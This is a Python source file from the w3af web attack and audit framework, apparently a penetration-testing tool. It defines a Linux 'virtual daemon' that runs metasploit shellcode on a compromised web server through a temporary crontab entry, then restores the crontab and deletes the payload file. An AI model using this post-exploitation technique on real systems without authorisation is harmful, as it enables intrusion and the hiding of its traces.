"""
lnx_vd.py

Copyright 2006 Andres Riancho

This file is part of w3af, http://w3af.org/ .

w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

"""

import time

from w3af.core.controllers.intrusion_tools.crontab_handler import crontabHandler
from w3af.core.controllers.vdaemon.vdaemon import vdaemon
from w3af.core.exceptions import BaseFrameworkException


class lnxVd(vdaemon):
    """
    This class represents a linux virtual daemon, a point of entry for
    metasploit plugins to exploit web applications.

    :author: Andres Riancho (andres.riancho@gmail.com)
    """

    def _clean_up(self):
        """
        Removes the created file and the crontab entry.
        """
        self._exec_method(*("/bin/rm " + self._remote_filename,))

    def _exec_payload(self, remote_filename):
        """
        This method should be implemented according to the remote operating
        system. The idea here is to execute the payload that was sent using
        _send_exe_to_server and generated by _generate_exe . In lnxVd I
        should run "chmod +x file; ./file"

        :return: None
        """
        cH = crontabHandler(self._exec_method, self._output)
        if not cH.can_delay():
            msg = "[lnxVd] Failed to create cron entry."
            self._output.debug(msg)
            raise BaseFrameworkException(msg)
        else:
            wait_time = cH.add_to_schedule(remote_filename)

            self._output.console(
                "Crontab entry successfully added. Waiting for shellcode execution."
            )
            time.sleep(wait_time + 3)

            self._output.debug(
                "Shellcode successfully executed, restoring old crontab."
            )
            cH.restore_old_schedule()

            self._output.debug("All done, check metasploit for results.")

    def get_os(self):
        return "linux"
